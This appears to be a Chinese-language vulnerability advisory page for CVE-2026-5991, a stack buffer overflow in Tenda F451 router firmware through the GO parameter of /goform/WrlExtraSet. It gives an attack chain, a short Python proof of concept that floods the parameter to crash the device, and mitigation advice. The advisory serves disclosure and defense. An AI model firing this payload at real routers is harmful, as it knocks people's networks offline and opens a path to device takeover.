IPBUF安全漏洞报告
English
CVE-2026-5991 CVSS 8.8 高危

CVE-2026-5991 Tenda F451栈溢出漏洞

披露日期: 2026-04-10
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-5991
漏洞类型
缓冲区溢出
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Tenda F451

相关标签

缓冲区溢出TendaIoT漏洞远程代码执行路由器安全

漏洞概述

Tenda F451路由器固件1.0.0.7版本中存在栈缓冲区溢出漏洞。攻击者可通过操纵/goform/WrlExtraSet接口中的GO参数,发送恶意数据包触发溢出,从而导致远程代码执行或设备拒绝服务。

技术细节

该漏洞位于Tenda F451路由器的/goform/WrlExtraSet处理函数中。程序在处理用户提交的“GO”参数时,使用了不安全的拷贝函数(如strcpy),未对输入长度进行校验直接将数据复制到栈变量中。由于CVSS向量显示攻击复杂度低且无需用户交互,远程攻击者只需构造超长字符串即可覆盖栈上的返回地址。成功利用此漏洞可导致系统崩溃,或通过控制指令指针执行任意恶意代码,完全接管设备权限。

攻击链分析

STEP 1
侦察
攻击者扫描网络,识别目标设备为Tenda F451路由器,并确认其运行在易受攻击的固件版本。
STEP 2
漏洞利用
攻击者向/goform/WrlExtraSet端点发送特制的HTTP POST请求,其中包含超长的“GO”参数值。
STEP 3
溢出执行
超长输入导致栈缓冲区溢出,覆盖返回地址,迫使处理器跳转至攻击者控制的恶意代码区域。
STEP 4
获取控制
攻击者成功在设备上执行任意代码,获得系统控制权,可能导致设备被植入后门或数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit(target_ip): url = f"http://{target_ip}/goform/WrlExtraSet" # Payload designed to trigger stack overflow # The exact size to overwrite EIP depends on the specific firmware stack layout payload = { "GO": "A" * 1000 # Example length, adjust based on fuzzing } try: print(f"Sending exploit to {url}...") response = requests.post(url, data=payload, timeout=5) print(f"Response status: {response.status_code}") # Check if service is down or behaving unexpectedly except requests.exceptions.RequestException as e: print(f"Connection error (possible crash): {e}") if __name__ == "__main__": exploit("192.168.0.1")

影响范围

Tenda F451 1.0.0.7

防御指南

临时缓解措施
在未获得官方补丁前,建议用户关闭路由器的远程管理功能,仅通过本地有线连接进行管理,并修改默认管理员密码以降低被自动化脚本攻击的风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表